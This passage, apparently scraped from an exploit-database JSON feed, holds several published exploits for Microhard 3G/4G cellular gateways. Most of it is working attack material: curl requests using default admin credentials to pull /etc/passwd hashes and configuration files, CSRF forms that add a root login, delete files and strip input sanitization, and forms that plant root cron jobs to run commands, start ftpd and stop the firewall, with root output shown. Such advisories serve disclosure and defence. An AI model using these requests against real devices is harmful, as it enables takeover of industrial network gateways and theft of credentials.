\r\nDownload (script):\r\n------------------\r\n# curl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc&savefile=passwd\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\nEdit (edit):\r\n------------\r\nCSRF add roOt:rewt to htpasswd:\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-editor.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"path\" value=\"/etc\" />\r\n <input type=\"hidden\" name=\"edit\" value=\"htpasswd\" />\r\n <input type=\"hidden\" name=\"filecontent\" value=\"root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/\r\nadmin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0\r\nroOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0\" />\r\n <input type=\"hidden\" name=\"save\" value=\"\u00c2 Save Changes\u00c2 \" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nDelete (delfile):\r\n-----------------\r\n \r\nGET /cgi-bin/webif/system-editor.sh?path=/www&delfile=pwn.txt HTTP/1.1\r\n \r\n \r\nOr edit and remove sanitization:\r\nFile: /usr/lib/webif/sanitize.awk\r\n \r\n// { _str=$0;\r\n gsub(/ /,\"\",_str)\r\n gsub(/\\|/,\"\",_str)\r\n gsub(/\\\\/,\"\",_str)\r\n gsub(/&/,\"\",_str)\r\n gsub(/\\^/,\"\",_str)\r\n gsub(/\\$/,\"\",_str)\r\n gsub(/'/,\"\",_str)\r\n gsub(/\"/,\"\",_str)\r\n gsub(/`/,\"\",_str)\r\n gsub(/\\{/,\"\",_str)\r\n gsub(/\\}/,\"\",_str)\r\n gsub(/\$/,\"\",_str)\r\n gsub(/\$/,\"\",_str)\r\n gsub(/;/,\"\",_str)\r\n print _str\r\n}\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30739"}, {"lastseen": "2018-07-17T20:05:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30738", "href": "https://0day.today/exploit/description/30738", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective\r\nname based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'\r\nand the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain\r\ncircumstances. This will enable the attacker to disclose sensitive information and help her\r\nin authentication bypass, privilege escalation and/or full system access.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5484\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\n/etc/m_cli/cli.conf:\r\n--------------------\r\n \r\ncurl \"http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf\" -H \"Authorization: Basic YWRtaW46YWRtaW4=\" |grep passwd\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577\r\npasswd admin \r\n \r\n \r\n/www/IPn4G.config:\r\n------------------\r\n \r\n[email\u00a0protected]:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512\r\n[email\u00a0protected]:~$ tar -zxf IPn4G.tar.gz ; ls\r\nconfig.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr\r\n[email\u00a0protected]:~$ cat config.boardinfo config.boardtype config.date config.name \r\n2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0\r\nAtheros AR7130 rev 2\r\nThu Jul 12 12:42:42 PDT 2018\r\nIPn4G\r\n[email\u00a0protected]:~$ cat usr/lib/hardware_desc \r\nmodem_type=\"N930\"\r\nLTE_ATCOMMAND_PORT=\"/dev/ttyACM0\"\r\nLTE_DIAG_PORT=\"\"\r\nLTE_GPS_PORT=\"\"\r\nwificard = \"0\"\r\n[email\u00a0protected]:~$ ls etc/\r\nconfig crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl\r\n[email\u00a0protected]:~$ ls etc/config/\r\ncomport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control\r\ncomport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver\r\ncoova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless\r\ncron eurd gre-tunnels localmonitor network pimd system vnstat wsclient\r\ncrontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc\r\ndatausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif\r\n[email\u00a0protected]:~$ cat etc/passwd \r\nroot:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash\r\nadmin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh\r\nupgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false\r\nat:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI\r\nnobody:*:65534:65534:nobody:/var:/bin/false\r\ntestlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh\r\ntestlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh\r\ntestingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false\r\nmsshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh\r\n \r\n \r\n/www/cgi-bin/system.conf:\r\n-------------------------\r\n \r\n[email\u00a0protected]:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H \"Authorization: Basic YWRtaW46YWRtaW4=\"\r\n[email\u00a0protected]:~$ cat system.conf |grep -irnH \"password\" -A2\r\nsystem.conf:236:#VPN Admin Password:\r\nsystem.conf-237-NetWork_IP_VPN_Passwd=admin\r\nsystem.conf-238-\r\n--\r\nsystem.conf:309:#V3 Authentication Password:\r\nsystem.conf:310:NetWork_SNMP_V3_Auth_Password=00000000\r\nsystem.conf-311-\r\nsystem.conf:312:#V3 Privacy Password:\r\nsystem.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000\r\n \r\n \r\nLogin to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.\r\n---------------------------------------------------------------------------------------------\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30738"}, {"lastseen": "2018-07-17T20:06:00", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30740", "href": "https://0day.today/exploit/description/30740", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root Vulnerability", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196\r\n IPn3Gii / Bullet-3G 1.2.0 build 1076\r\n IPn4Gii / Bullet-LTE 1.2.0 build 1078\r\n BulletPlus 1.3.0 build 1036\r\n Dragon-LTE 1.1.0 build 1036\r\n \r\nSummary: The new IPn4Gb provides a rugged, industrial strength wireless solution\r\nusing the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb\r\nfeatures integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control\r\nLists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial\r\nRS232/485/422 devices!\r\n \r\nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses\r\nthe widespread deployment of cellular network infrastructure for critical data collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The application suffers from multiple authenticated arbitrary remote code execution\r\nvulnerabilities with highest privileges. This is due to multiple hidden and undocumented\r\nfeatures within the admin interface that allows an attacker to create crontab jobs and/or\r\nmodify the system startup script that allows execution of arbitrary code as root user.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5479\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nCrontab #1:\r\n-----------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-crontabs.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sltMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXminute\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXhour\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXday\" value=\"\" />\r\n <input type=\"hidden\" name=\"txtCommand\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthCronEnabled\" value=\"0\" />\r\n <input type=\"hidden\" name=\"txtCrontabEntry\" value=\"\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg02e2c8\" value=\"*/3\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg02e2c8\" value=\"/etc/init.d/ntpclient start\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg02e2c8\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg04b4e9\" value=\"id > /www/pwn.txt\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg04b4e9\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"HOURS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"DAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"MONTHS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"COMMAND_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"ENABLED_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"action\" value=\"Save Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n---\r\n \r\ncurl http://192.168.1.1/pwn.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\nStart ftpd:\r\n-----------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-startup.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"path\" value=\"/etc/init.d\" />\r\n <input type=\"hidden\" name=\"edit\" value=\"custom-user-startup\" />\r\n <input type=\"hidden\" name=\"filecontent\" value=\"#!/bin/sh /etc/rc.common\r\nSTART=90\r\n# place your own startup commands here\r\n#\r\n# REMEMBER: You *MUST* place an '&' after launching programs you \r\n# that are to continue running in the background.\r\n#\r\n# i.e. \r\n# BAD: upnpd\r\n# GOOD: upnpd &\r\n# \r\n# Failure to do this will result in the startup process halting\r\n# on this file and the diagnostic light remaining on (at least\r\n# for WRT54G(s) models).\r\n#\r\n \r\nftpd &\r\n \r\n\" />\r\n <input type=\"hidden\" name=\"save\" value=\"\u00c2 Save Changes\u00c2 \" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nCrontab #2:\r\n-----------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-crontabs.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sltMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMinutes\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthHours\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDays\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthMonths\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDaysOfWeek\" value=\"*\" />\r\n <input type=\"hidden\" name=\"ddEveryXminute\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXhour\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXday\" value=\"\" />\r\n <input type=\"hidden\" name=\"txtCommand\" value=\"uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt\" />\r\n <input type=\"hidden\" name=\"chkCronEnabled\" value=\"on\" />\r\n <input type=\"hidden\" name=\"txthCronEnabled\" value=\"1\" />\r\n <input type=\"hidden\" name=\"txtCrontabEntry\" value=\"* * * * * uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg02e2c8\" value=\"*/3\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg02e2c8\" value=\"/etc/init.d/ntpclient start\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg02e2c8\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg0421ec\" value=\"uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg0421ec\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"HOURS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"DAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"MONTHS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"COMMAND_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"ENABLED_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"action\" value=\"Save Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n---\r\n \r\ncurl http://192.168.1.1/os.txt\r\nLinux IPn4G 2.6.32.9 #1 Mon Jun 20 15:28:30 MDT 2016 mips GNU/Linux\r\ndrwxr-xr-x 5 root root 0 Jul 1 14:01 .\r\ndrwxr-xr-x 7 root root 0 Dec 31 1969 ..\r\n-rw-r--r-- 1 root root 4 Apr 12 2010 .version\r\n-rw-r--r-- 1 root root 13461 May 8 15:54 IPn4G.config\r\ndrwxr-xr-x 3 root root 0 Jun 20 2016 cgi-bin\r\n-rw-r--r-- 1 root root 2672 Apr 1 2010 colorize.js\r\n-rwxr-xr-x 1 root root 3638 May 10 2010 favicon.ico\r\ndrwxr-xr-x 2 root root 959 Jun 20 2016 images\r\n-rw-r--r-- 1 root root 600 Feb 12 2013 index.html\r\ndrwxr-xr-x 2 root root 224 Jun 20 2016 js\r\n-rw-r--r-- 1 root root 68 Mar 1 14:09 os.txt\r\ndrwxr-xr-x 2 root root 79 Jun 20 2016 svggraph\r\ndrwxr-xr-x 2 root root 0 Jul 1 14:02 themes\r\ndrwxr-xr-x 2 root root 0 May 8 16:21 vnstat\r\n-rw-r--r-- 1 root root 953 Apr 1 2010 webif.js\r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\nDisable firewall:\r\n-----------------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-crontabs.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sltMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMinutes\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthHours\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDays\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthMonths\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDaysOfWeek\" value=\"*\" />\r\n <input type=\"hidden\" name=\"ddEveryXminute\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXhour\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXday\" value=\"\" />\r\n <input type=\"hidden\" name=\"txtCommand\" value=\"/etc/init.d/firewall stop\" />\r\n <input type=\"hidden\" name=\"chkCronEnabled\" value=\"on\" />\r\n <input type=\"hidden\" name=\"txthCronEnabled\" value=\"1\" />\r\n <input type=\"hidden\" name=\"txtCrontabEntry\" value=\"* * * * * /etc/init.d/firewall stop\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg02e2c8\" value=\"*/3\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg02e2c8\" value=\"/etc/init.d/ntpclient start\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg02e2c8\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg04f65b\" value=\"/etc/init.d/firewall stop\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg04f65b\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"HOURS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"DAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"MONTHS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"COMMAND_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"ENABLED_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"action\" value=\"Save Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30740"}, {"lastseen": "2018-07-17T20:05:44", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "1337DAY-ID-30736", "href": "https://0day.today/exploit/description/30736", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery Vulnerabil", "type": "zdt", "sourceData": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities\r\n \r\n \r\nVendor: Microhard Systems Inc.\r\nProduct web page: http://www.microhardcorp.com\r\nAffected version: IPn4G 1.1.0 build 1098\r\n IPn3Gb 2.2.0 build 2160\r\n IPn4Gb 1.1.6 build 1184-14\r\n IPn4Gb 1.1.0 Rev 2 build 1090-2\r\n IPn4Gb 1.1.0 Rev 2 build 1086\r\n Bullet-3G 1.2.0 Rev A build 1032\r\n VIP4Gb 1.1.6 build 1204\r\n VIP4G 1.1.6 Rev 3.0 build 1184-14\r\n VIP4G-WiFi-N 1.1.6 Rev 